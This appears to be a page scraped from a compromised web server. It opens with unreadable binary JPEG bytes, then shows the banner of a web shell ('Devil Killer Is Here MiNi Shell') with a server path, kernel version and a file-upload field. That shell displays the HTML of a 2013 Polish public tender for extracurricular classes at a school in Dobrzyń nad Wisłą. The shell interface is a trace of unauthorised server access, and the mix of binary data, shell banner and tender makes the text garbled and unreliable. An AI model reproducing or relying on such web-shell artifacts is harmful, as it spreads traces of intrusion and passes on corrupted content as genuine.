JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130917/377264-N-2013.html

<p class="kh_header"><b>Lipno: Usługa edukacyjna skierowana do uczniów Zespołu Szkół w Dobrzyniu nad Wisłą realizowana w ramach Projektu pn. Stawiam na lepsze jutro w Powiecie Lipnowskim  realizowanego w ramach Działania 9.2  Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 377264 - 2013; data zamieszczenia: 17.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Lipnowski , ul. Sierakowskiego 10B, 87-600 Lipno, woj. kujawsko-pomorskie, tel. 54 2872039, faks 54 2872039.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.lipnowski.powiat.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna skierowana do uczniów Zespołu Szkół w Dobrzyniu nad Wisłą realizowana w ramach Projektu pn. Stawiam na lepsze jutro w Powiecie Lipnowskim  realizowanego w ramach Działania 9.2  Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa edukacyjna skierowana do uczniów Zespołu Szkół w Dobrzyniu nad Wisłą, która będzie realizowana w terminie od 01.10.2013r. do 31.03.2014r. w godzinach od 8:00 do 19:00 od poniedziałku do piątku, gdyż zajęcia pozalekcyjne będą odbywać się w godzinach dostosowanych do planu lekcji uczniów biorących udział w projekcie, dla grup uczniów wyłonionych na podstawie przeprowadzonego wcześniej naboru. Zajęcia będą prowadzone w Zespole Szkół w Dobrzyniu nad Wisłą, ul. Szkolna 5. Zajęcia pozalekcyjne będą realizowane wg harmonogramu dostosowanego do planu zajęć szkolnych grup uczniów w ZS w Dobrzyniu nad Wisłą. Harmonogram będzie ustalany na każdy miesiąc odrębnie przez Dyrektora Zespołu Szkół w Dobrzyniu nad Wisłą. W związku z tym, że usługę edukacyjną stanowią zajęcia pozalekcyjne ich program musi być zgodny z podstawą programową realizowaną przez daną szkołę. Usługa edukacyjna składa się z następujących części:

Część 1
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka polskiego w łącznej liczbie 20 godzin dla klasy maturalnej - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do II 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 2
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka polskiego w łącznej liczbie 20 godzin dla klasy maturalnej - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do II 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 3
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka polskiego w łącznej liczbie 20 godzin dla klasy III- dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do II 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 4
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka polskiego w łącznej liczbie 20 godzin dla klasy III - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do II 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 5
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka angielskiego w łącznej liczbie 20 godzin dla klasy maturalnej - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do XII 2013r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 6
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka angielskiego w łącznej liczbie 20 godzin dla klasy III - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do XII 2013r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 7
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka rosyjskiego w łącznej liczbie 20 godzin dla klasy maturalnej - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do XII 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 8
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z języka rosyjskiego w łącznej liczbie 20 godzin dla klasy III - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do XII 2013r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 9
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z matematyki w łącznej liczbie 20 godzin dla klasy maturalnej - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do I 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 10
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z matematyki w łącznej liczbie 20 godzin dla klasy maturalnej - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do I 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 11
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z matematyki w łącznej liczbie 20 godzin dla klasy III - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013 r. - do I 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 12
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z matematyki w łącznej liczbie 20 godzin dla klasy III - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013 r. - do I 2014r. 
Zajęcia mają na celu podniesienie wyników egzaminów maturalnych.

Część 13
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z przedmiotów zawodowych w zawodzie technik rolnik: mechanizacja rolnictwa, produkcja roślinna, produkcja zwierzęca - w łącznej liczbie 40 godzin dla klasy III TR - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do III 2014r. 
Zajęcia mają na celu nadrobienie zaległości programowych powstałych w trakcie nauki oraz wyposażenie uczniów w wiadomości i umiejętności umożliwiające uzyskanie pozytywnych wyników na egzaminie potwierdzającym kwalifikacje zawodowe.  

Część 14
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z przedmiotów zawodowych w zawodzie technik rolnik: mechanizacja rolnictwa, produkcja roślinna, produkcja zwierzęca - w łącznej liczbie 40 godzin dla klasy IV TR - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do III 2014r. 
Zajęcia mają na celu nadrobienie zaległości programowych powstałych w trakcie nauki oraz wyposażenie uczniów w wiadomości i umiejętności umożliwiające uzyskanie pozytywnych wyników na egzaminie potwierdzającym kwalifikacje zawodowe.  

Część 15
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z przedmiotów zawodowych w zawodzie technik żywienia: organizacja usług gastronomicznych, obsługa konsumenta, technologia gastronomiczna - w łącznej liczbie 40 godzin dla klasy III TŻ - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do III 2014r. 
Zajęcia mają na celu nadrobienie zaległości programowych powstałych w trakcie nauki oraz wyposażenie uczniów w wiadomości i umiejętności umożliwiające uzyskanie pozytywnych wyników na egzaminie potwierdzającym kwalifikacje zawodowe.  

Część 16
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych z przedmiotów zawodowych w zawodzie technik żywienia: organizacja usług gastronomicznych, obsługa konsumenta, technologia gastronomiczna - w łącznej liczbie 40 godzin dla klasy IV TŻ - dla 1 grupy (min. 8 osób). Zajęcia powinny być zgodne w zakresie treści z obowiązującą podstawą programową i zostać przeprowadzone od X 2013r. - do III 2014r. 
Zajęcia mają na celu nadrobienie zaległości programowych powstałych w trakcie nauki oraz wyposażenie uczniów w wiadomości i umiejętności umożliwiające uzyskanie pozytywnych wyników na egzaminie potwierdzającym kwalifikacje zawodowe.  

Część 17
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych specjalistycznych z zakresu obsługi kasy fiskalnej w łącznej liczbie 10 godzin dla zainteresowanych uczniów 1 grupy (min. 10 osób). Wykonawca zobowiązany jest również przeprowadzić test praktyczny na rozpoczęcie i zakończenie zajęć w celu wykazania poziomu wiedzy i umiejętności uczestników przed rozpoczęciem zajęć i na ich zakończenie.  Zajęcia powinny zostać przeprowadzone w miesiącu X 2013r. 
Zajęcia mają na celu zniwelowanie dysproporcji między umiejętnościami przyszłych absolwentów a potrzebami rynku pracy.

Część 18
Opracowanie programu oraz przeprowadzenie wg niego zajęć pozalekcyjnych specjalistycznych z zakresu obsługi kasy fiskalnej w łącznej liczbie 10 godzin dla zainteresowanych uczniów 1 grupy (min. 10 osób). Wykonawca zobowiązany jest również przeprowadzić test praktyczny na rozpoczęcie i zakończenie zajęć w celu wykazania poziomu wiedzy i umiejętności uczestników przed rozpoczęciem zajęć i na ich zakończenie.  Zajęcia powinny zostać przeprowadzone w miesiącu X 2013r. 
Zajęcia mają na celu zniwelowanie dysproporcji między umiejętnościami przyszłych absolwentów a potrzebami rynku pracy.

Część 19
Opracowanie programu oraz przeprowadzenie wg niego zajęć warsztatowych oraz indywidualnych z zakresu doradztwa zawodowego w łącznej liczbie 20 godzin zajęć warsztatowych dla uczniów klasy pierwszej - dla 1 grupy (8 osób) oraz 2 godz. zajęć indywidualnych na każdego ucznia (łącznie 36 godzin), których zwieńczeniem będzie przekazanie każdemu uczniowi indywidualnego scenariusza edukacyjno- zawodowego, przy czym kopie przekazanych scenariuszy wraz z listą potwierdzającą ich przekazanie uczniom należy przekazać Zamawiającemu (do Biura Projektu). Zajęcia powinny zostać przeprowadzone od X 2013r. - do XII 2013r.
Zajęcia mają na celu motywację uczniów do aktywnego poszukiwania pracy, dalszego kształcenia i doskonalenia zawodowego.

Prowadzący/a (dotyczy wszystkich części) zajęcia pozalekcyjne będzie odpowiadał/a za przygotowanie, realizację i dokumentację pozalekcyjnych zajęć dodatkowych dla uczniów Zespołu Szkół w Dobrzyniu nad Wisłą. 
Szczegółowe obowiązki  prowadzących zajęcia pozalekcyjne :
- opracowanie programu zajęć pozalekcyjnych(specjalistycznych), który musi uwzględniać indywidualne możliwości uczniów biorących udział w projekcie oraz zawierać treści uwzględniające standardy wymagań egzaminacyjnych na egzamin, z przedmiotu, którego dotyczą zajęcia i przedstawienie go do akceptacji koordynatorowi w ZS w Dobrzyniu n.W,
- program zajęć będzie realizowany w oparciu o przeprowadzone przez wykonawców wyłonionych do przeprowadzenia poszczególnych części przedmiotu zamówienia, testy diagnozujące wiadomości i umiejętności uczniów (zajęcia pozalekcyjne z j. polskiego, matematyki, j. angielskiego, j. rosyjskiego oraz z zakresu przedmiotów zawodowych) - na zakończenie zajęć zarówno z zakresu przedmiotów kluczowych jak i przedmiotów zawodowych należy przeprowadzić testy ewaluacyjne oceniające podniesienie wiedzy i umiejętności w porównaniu z testami przeprowadzonymi wcześniej- sprawdzone i ocenione testy wraz z ich zbiorczym zestawieniem należy przekazać do Biura Projektu wraz z Dziennikiem zajęć,
- w przypadku zajęć z zakresu doradztwa zawodowego zajęcia odbywać się będą w formie warsztatów oraz w formie zajęć indywidualnych, których zwieńczeniem będzie przekazanie każdemu uczniowi indywidualnego scenariusza edukacyjno- zawodowego, na początku i  na zakończenie zajęć należy przeprowadzić ankietę odnoszącą się, w szczególności do zdolności uczestników zajęć do wyboru ścieżki zawodowej- zweryfikowane ankiety wraz z ich zbiorczym zestawieniem należy przekazać do Biura Projektu wraz z Dziennikiem zajęć,, 
- w przypadku zajęć pozalekcyjnych(specjalistycznych), z zakresu obsługi kasy fiskalnej wykonawcy wyłonieni do przeprowadzenia poszczególnych części są zobowiązani do przeprowadzenia na początku i na końcu zajęć testu praktycznego dla uczestników zajęć- sprawdzone i ocenione testy wraz z ich zbiorczym zestawieniem należy przekazać do Biura Projektu wraz z Dziennikiem zajęć, 
- prowadzenie zajęć pozalekcyjnych(specjalistycznych), zgodnie ze szczegółowym harmonogramem comiesięcznie ustalonym przez Dyrektora ZST w Lipnie- harmonogram zajęć pozalekcyjnych nie może kolidować z planem zajęć poszczególnych grup i może być modyfikowany przez Dyrektora szkoły w uzasadnionych przypadkach,
- dokumentowanie zajęć pozalekcyjnych(specjalistycznych) poprzez wpisy w dzienniku zajęć i prowadzenie list obecności- należy je odpowiednio oznakować, a po zakończeniu zajęć przekazać Zamawiającemu do Biura Projektu,
- prowadzenie miesięcznej karty czasu pracy, którą po zakończeniu każdego miesiąca należy dostarczyć do Biura Projektu,
- w przypadku udziału w innych projektach wykonawcy będącego osobą fizyczną zobowiązany on jest dostarczyć do Biura Projektu miesięczną ewidencję godzin i zadań realizowanych w ramach tych projektów, a także najpóźniej w dniu podpisania umowy złożyć oświadczenie niezbędne do stwierdzenia kwalifikowalności wydatków związanych z angażowaniem personelu (wykonawcy) zgodnie z obowiązującymi Wytycznymi w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki, 
- wspomaganie promocji i ewaluacji, w tym w szczególności obowiązek prawidłowego oznakowania pomieszczenia, w którym odbywają się zajęcia pozalekcyjne(specjalistyczne) i poinformowanie uczniów o fakcie współfinansowania zajęć z EFS,
- odpowiedzialność materialna prowadzącego zajęcia za mienie znajdujące się w sali dydaktycznej, w której prowadzone są zajęcia,
- bieżące informowanie o frekwencji na prowadzonych zajęciach pozalekcyjnych, oraz o ewentualnym zaprzestaniu uczestniczenia(rezygnacji) w prowadzonych zajęciach 
- obowiązek osiągnięcia przyjętych w ramach projektu wskaźników, tj. liczby godzin prowadzonych zajęć oraz liczby uczniów uczestniczących w zajęciach w ramach danej grupy oraz realizacji założonych celów poszczególnych zajęć w projekcie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił sposobu dokonywania oceny spełniania warunku - ocena zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wg. wzoru określonego w Załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił sposobu dokonywania oceny spełniania warunku - ocena zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wg. wzoru określonego w Załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił sposobu dokonywania oceny spełniania warunku - ocena zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wg. wzoru określonego w Załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca dysponował min. 1 osobą  posiadającą wykształcenie i doświadczenie określonej poniżej w pkt I - III ( w zależności od części na jakie składa ofertę )
I.  Osoby prowadzące zajęcia z przedmiotów ogólnych i zawodowych powinni spełniać następujące wymagania:
a) Ukończone studia wyższe kierunkowe, zgodne z rodzajem prowadzonych zajęć  lub wykształcenie wyższe i ukończone studia podyplomowe w zakresie prowadzonych zajęć.
b) Posiadać przygotowanie pedagogiczne.
c) Stopień awansu zawodowego co najmniej nauczyciela kontraktowego.
d) Co najmniej roczny staż pracy pedagogicznej w szkole ponadgimnazjalnej w okresie ostatnich 3 lat.
			
			
II. Osoby prowadzące zajęcia z obsługi kasy fiskalnej powinni spełniać    następujące wymagania:

a) Wykonawca musi posiadać praktyczną i teoretyczną na temat obsługi kasy fiskalnej.
b) Stopień awansu zawodowego co najmniej nauczyciela kontraktowego.
c) Co najmniej roczny staż pracy pedagogicznej w szkole ponadgimnazjalnej w okresie ostatnich 3 lat.


III. Osoby prowadzące zajęcia z  zakresu doradztwa zawodowego.

a) Wykształcenie wyższe  w kierunku doradztwa zawodowego lub studia podyplomowe w tym kierunku.
b) Doświadczenie w prowadzeniu zajęć z zakresu doradztwa zawodowego z młodzieżą ponadgimnazjalną .
c) Staż pracy na stanowisku doradcy zawodowego min.  1 rok.
w celu potwierdzenia tego warunku należy dołączyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami wg. wzoru określonego w Załączniku nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił sposobu dokonywania oceny spełniania warunku - ocena zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wg. wzoru określonego w Załączniku nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oferta
pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
